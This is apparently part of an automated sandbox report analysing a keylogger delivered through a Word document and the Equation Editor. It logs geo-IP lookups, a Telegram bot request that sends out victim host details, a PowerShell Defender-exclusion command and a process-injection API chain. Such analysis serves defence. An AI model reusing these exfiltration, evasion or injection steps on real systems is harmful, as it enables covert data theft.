                                                                                                            2024-09-27 14:00:58 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:00:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.2249175188.114.97.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:00:59 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:00:59 UTC676INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:00:59 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20215
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FfUpdQPmlQYGMiUx8hVLlK5T115r5dnauumOXAJUq7GLSjsov612DJL%2BtP52ETLTJLRa2pht%2BVtk0BOrycpxrJew1SPV0Kjux%2BrzHMH0i9VeejpyFyn8A2ZNsimBnQbIrqH4l4VK"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05ee9c477cfa-EWR
                                                                                                            2024-09-27 14:00:59 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:00:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.2249177188.114.96.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:01:01 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:01:01 UTC674INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:01 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20217
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AFeM7K780P0AH1GqTrhkaQuEx4VJnu1PR8BQyqL9ubQqLlHmmKrzTDlMhH19%2BalzMxrjJDM072OMctNF3iT9k8HVEIEZZRtzE4e5RptufVHLnFJPTaGuv505NMD30i33%2Bk8K6Uie"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c05f97e994382-EWR
                                                                                                            2024-09-27 14:01:01 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:01:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.2249179188.114.97.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:01:03 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:01:03 UTC676INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:03 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20219
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhmZ9gY3JXstqJX9uwlMHsga7W13ko%2BdxTlzaB%2Bx34PXqG9YGJYYRijnTxchIJC89FVtsV6%2FVInqucXXQfDPR2IEnV4G5m5qySQlvbZhJRa8RwZnm2R7fTav9797TwCl9fgfr09y"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c06074e2e4393-EWR
                                                                                                            2024-09-27 14:01:03 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:01:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.2249181188.114.97.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:01:05 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:01:05 UTC680INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:05 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20221
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D0wrPpyL%2BYUtqTrFK7SR1gsFgc3hZtsb8kocHY4sRMVVAK6y364Obepaakp%2BZDc2iH60cjugqrpYRgna8WrHjOnCEQ9L%2BU6NzWkRPT%2BbqPyZsNVMPw8k51sihkX4DBSKSuPaf%2FtY"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c0613dd5d7ca0-EWR
                                                                                                            2024-09-27 14:01:05 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:01:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.2249183188.114.97.34433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:01:08 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            2024-09-27 14:01:08 UTC688INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 27 Sep 2024 14:01:08 GMT
                                                                                                            Content-Type: application/xml
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            access-control-allow-origin: *
                                                                                                            vary: Accept-Encoding
                                                                                                            Cache-Control: max-age=86400
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 20224
                                                                                                            Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vfqqmdCHqak%2FhcRmTUDa8ssW%2Fh%2BIWkV%2FwaQ6WSuqGF7jVUpD0tfkn6gk%2B4BEE%2BlP40OTcN7l3EvrdAIw8KEPmNGWRP9U%2B%2BtvuR4UqXTwRvyM2ARDRx%2FNul2YEZBoCNrwDzDC5uWu"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8c9c062218ef42f8-EWR
                                                                                                            2024-09-27 14:01:08 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                                                            2024-09-27 14:01:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.2249184149.154.167.2204433952C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-09-27 14:01:08 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                            Host: api.telegram.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-09-27 14:01:09 UTC344INHTTP/1.1 404 Not Found
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 27 Sep 2024 14:01:09 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 55
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-09-27 14:01:09 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:10:00:13
                                                                                                            Start date:27/09/2024
                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                            Imagebase:0x13f0c0000
                                                                                                            File size:1'423'704 bytes
                                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:9
                                                                                                            Start time:10:00:35
                                                                                                            Start date:27/09/2024
                                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                            Imagebase:0x400000
                                                                                                            File size:543'304 bytes
                                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:10:00:38
                                                                                                            Start date:27/09/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                                                                                                            Imagebase:0xd00000
                                                                                                            File size:673'280 bytes
                                                                                                            MD5 hash:016DBBC401CC2BE3E4ACC1E716E94D47
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 100%, Avira
                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                            • Detection: 53%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:12
                                                                                                            Start time:10:00:39
                                                                                                            Start date:27/09/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                                                                                                            Imagebase:0x10d0000
                                                                                                            File size:427'008 bytes
                                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:13
                                                                                                            Start time:10:00:40
                                                                                                            Start date:27/09/2024
                                                                                                            Path:C:\Users\user\AppData\Roaming\millitingacy20306.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                                                                                                            Imagebase:0xd00000
                                                                                                            File size:673'280 bytes
                                                                                                            MD5 hash:016DBBC401CC2BE3E4ACC1E716E94D47
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Non-executed Functions

                                                                                                              Function 00664F07 Relevance: .2, Instructions: 229COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0065F000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_65f000_EQNEDT32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 84119c382490ae06eeafb90a1cf6951d8335e25b02a91c721d510e83e56e600f
                                                                                                              • Instruction ID: 65bac565dc2e629974a38dc74c1aae385b7ad9dc32aa1ec3660c757f401ba4e1
                                                                                                              • Opcode Fuzzy Hash: 84119c382490ae06eeafb90a1cf6951d8335e25b02a91c721d510e83e56e600f
                                                                                                              • Instruction Fuzzy Hash: 1591976684E7C45FC3138B705C6A6813F70AE23214B1E85EBC4C1CF4F3E65A8A4AD762
                                                                                                              Function 00669921 Relevance: .2, Instructions: 219COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.423390296.000000000065F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0065F000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_65f000_EQNEDT32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f51fa9f19bcfe5bbac9067c7c92fdc052886b85be02a41058ff5e808dac045fd
                                                                                                              • Instruction ID: a7583c6926878c8f65e06adb258343aa981039ca111af39abd446778a83e1977
                                                                                                              • Opcode Fuzzy Hash: f51fa9f19bcfe5bbac9067c7c92fdc052886b85be02a41058ff5e808dac045fd
                                                                                                              • Instruction Fuzzy Hash: 4A91A96A44E7C09FCB0397700C7A8857FB1AE23210B4E52DBC9C5CF5A3E6191A5ED762

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.2%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:47
                                                                                                              Total number of Limit Nodes:3
                                                                                                              execution_graph 6778 9d0af0 6779 9d0b0a 6778->6779 6790 9d10ab 6779->6790 6793 9d1338 6779->6793 6797 9d1459 6779->6797 6801 9d172d 6779->6801 6805 9d1030 6779->6805 6809 9d0f71 6779->6809 6813 9d1041 6779->6813 6819 9d14a4 6779->6819 6822 9d1054 6779->6822 6780 9d0b2e 6826 21f2a0 6790->6826 6794 9d133e 6793->6794 6795 9d1973 6794->6795 6830 21e6e8 6794->6830 6798 9d134f 6797->6798 6799 9d1973 6798->6799 6800 21e6e8 ResumeThread 6798->6800 6800->6798 6802 9d173a 6801->6802 6804 21f2a0 WriteProcessMemory 6802->6804 6803 9d1947 6804->6803 6806 9d17db 6805->6806 6834 21f400 6806->6834 6810 9d0f77 6809->6810 6838 21f638 6810->6838 6814 9d104e 6813->6814 6815 9d1187 6813->6815 6842 21ec10 6814->6842 6816 9d1420 6815->6816 6817 21e6e8 ResumeThread 6815->6817 6816->6780 6817->6815 6846 21f178 6819->6846 6823 9d105d 6822->6823 6825 21f2a0 WriteProcessMemory 6823->6825 6824 9d1284 6824->6780 6825->6824 6827 21f2ec WriteProcessMemory 6826->6827 6829 21f38b 6827->6829 6829->6780 6831 21e72c ResumeThread 6830->6831 6833 21e77e 6831->6833 6833->6794 6835 21f44c ReadProcessMemory 6834->6835 6837 21f4ca 6835->6837 6837->6780 6839 21f6bf CreateProcessA 6838->6839 6841 21f91d 6839->6841 6843 21ec59 Wow64SetThreadContext 6842->6843 6845 21ecd7 6843->6845 6845->6815 6847 21f1bc VirtualAllocEx 6846->6847 6849 21f23a 6847->6849 6849->6780

                                                                                                              Executed Functions

                                                                                                              Function 0021F638 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
